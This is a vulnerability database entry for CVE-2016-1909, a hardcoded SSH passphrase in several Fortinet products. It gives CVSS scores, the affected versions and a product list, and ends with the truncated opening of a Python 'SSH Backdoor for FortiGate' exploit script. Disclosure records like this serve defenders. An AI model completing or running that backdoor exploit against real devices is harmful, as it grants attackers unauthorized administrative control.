10
CVSSv2

CVE-2016-1909

Published: 15/01/2016 Updated: 15/07/2016
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Fortinet FortiAnalyzer prior to 5.0.12 and 5.2.x prior to 5.2.5; FortiSwitch 3.3.x prior to 3.3.3; FortiCache 3.0.x prior to 3.0.8; and FortiOS 4.1.x prior to 4.1.11, 4.2.x prior to 4.2.16, 4.3.x prior to 4.3.17 and 5.0.x prior to 5.0.8 have a hardcoded passphrase for the Fortimanager_Access account, which allows remote malicious users to obtain administrative access via an SSH session.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

fortinet fortios 5.0.2

fortinet fortios 5.0.6

fortinet fortios 5.0.7

fortinet fortios 5.0

fortinet fortios 5.0.1

fortinet fortios

fortinet fortios 5.0.3

fortinet fortios 5.0.4

fortinet fortios 5.0.5

fortinet fortios 5.0.0

Exploits

#!/usr/bin/env python # SSH Backdoor for FortiGate OS Version 4x up to 507 # Usage: /fgt_ssh_backdoorpy <target-ip> import socket import select import sys import paramiko from paramikopy3compat import u import base64 import hashlib import termios import tty def custom_handler(title, instructions, prompt_list): n = prompt_list[0][ ...